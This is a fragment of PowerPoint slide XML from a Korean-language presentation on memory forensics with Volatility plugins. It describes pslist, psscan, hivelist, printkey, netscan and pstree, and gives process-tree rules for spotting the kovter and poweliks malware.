              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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Calibri"/>
                <a:sym typeface="Calibri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C5EE34C-F37C-4E94-87D4-A445F73FA6F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4668897" y="5143499"/>
              <a:ext cx="2781813" cy="426720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400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>프로세스 은닉을 탐지하기 위해 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>pslist</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>과 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>psscan</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t> 비교하며 보여주는 플러그인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3211855-F848-4E98-8BD6-13115BAD873B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7854538" y="4228403"/>
            <a:ext cx="2985638" cy="5147695"/>
            <a:chOff x="7909786" y="4263005"/>
            <a:chExt cx="2781813" cy="5147695"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="순서도: 수행의 시작/종료 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAB0B2AB-D092-419B-B395-743996266EC8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8125985" y="4263005"/>
              <a:ext cx="2338472" cy="650658"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartTerminator">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1A305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800" b="1" dirty="0" err="1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에스코어 드림 4 Regular"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>hivelist</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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Calibri"/>
                <a:sym typeface="Calibri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496109B-0A6B-425E-949B-7393C9F5A2C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7909786" y="5143497"/>
              <a:ext cx="2781813" cy="426720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400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>레지스트리 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>하이브의</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t> 물리 주소</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>가상 주소</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>경로를 포함한 이름을 보여주는 플러그인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08A0504-DB74-41DB-B144-8E3DA306B725}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11096007" y="4228403"/>
            <a:ext cx="2985638" cy="5147695"/>
            <a:chOff x="11202236" y="4263005"/>
            <a:chExt cx="2781813" cy="5147695"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="순서도: 수행의 시작/종료 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BF878CD-1296-4694-8B54-1ECFCDB4020A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11423907" y="4263005"/>
              <a:ext cx="2338472" cy="650658"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartTerminator">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1A305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에스코어 드림 4 Regular"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>printkey</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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Calibri"/>
                <a:sym typeface="Calibri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1426B78-AE6D-4F64-9540-E0F650FCDB72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11202236" y="5143497"/>
              <a:ext cx="2781813" cy="426720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400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>레지스트리 키의 서브 키</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>값 보여주는 플러그인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9CE83CC-9F78-43C4-A775-9BB399971027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14337475" y="4228403"/>
            <a:ext cx="2985638" cy="5147695"/>
            <a:chOff x="14346866" y="4263005"/>
            <a:chExt cx="2781813" cy="5147695"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="순서도: 수행의 시작/종료 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F7FA891-F544-4C8A-A463-084188E17517}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14568537" y="4263005"/>
              <a:ext cx="2338472" cy="650658"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartTerminator">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1A305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에스코어 드림 4 Regular"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>netscan</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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Calibri"/>
                <a:sym typeface="Calibri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DE98429-B9BA-4356-AD3A-6D92444BDAA6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14346866" y="5143497"/>
              <a:ext cx="2781813" cy="426720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400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>tcp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>, raw </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>소켓 등을 보여주는 플러그인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6480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수행의 시작/종료 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{163EF5AC-960F-4530-935B-12E84DD901A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996696" y="2477561"/>
            <a:ext cx="2338472" cy="650658"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6A6A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에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>pstree</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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+mn-ea"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri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704227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="13809534" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Memory Analysis : Volatility Plug-in</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Google Shape;286;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40B9BBFB-A24E-4BFB-B833-1957FEAC5D78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="3593157"/>
            <a:ext cx="11582400" cy="683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kovter</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Google Shape;288;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A31F168-DE13-41B6-BFD5-F551CF4A6E9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734"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1560576" y="8677131"/>
            <a:ext cx="10146201" cy="73183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Google Shape;289;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43A1A978-B81D-426C-940E-43D2B7FC3779}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="5961379"/>
            <a:ext cx="11811000" cy="683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poweliks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1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 </a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;290;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B358390A-C9F5-41A8-A887-719EF4428806}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="6701246"/>
            <a:ext cx="15392400" cy="1348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poweliks가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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하위</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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계층에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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 rundll32.exe와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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powershell.exe를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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실행시키는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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것을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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보고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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의심되는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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프로세스들을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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생성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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됨</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just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1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>-&gt; Rule : 맨 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>밑의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>하위</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>프로세스가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>powershell인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>것이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t> DLL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t> 의심</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A3053"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Google Shape;291;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BD50F87-A2F0-42C2-941E-43C0BEEFAB3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="4256069"/>
            <a:ext cx="15392400" cy="720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1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>-&gt; Rule : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>해당</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>프로세스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>(regsvr32.exe)는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>최상위</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>경로에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>실행되며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>같은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>프로세스를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>자식</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>프로세스로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/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2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>생성</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A3053"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Google Shape;293;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4885DB4-91AB-4E0B-A31D-26B7F86FA03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b="1162"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1552555" y="5032869"/>
            <a:ext cx="8655081" cy="57062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27868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수행의 시작/종료 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{163EF5AC-960F-4530-935B-12E84DD901A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3783764" y="2477561"/>
            <a:ext cx="2338472" cy="650658"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
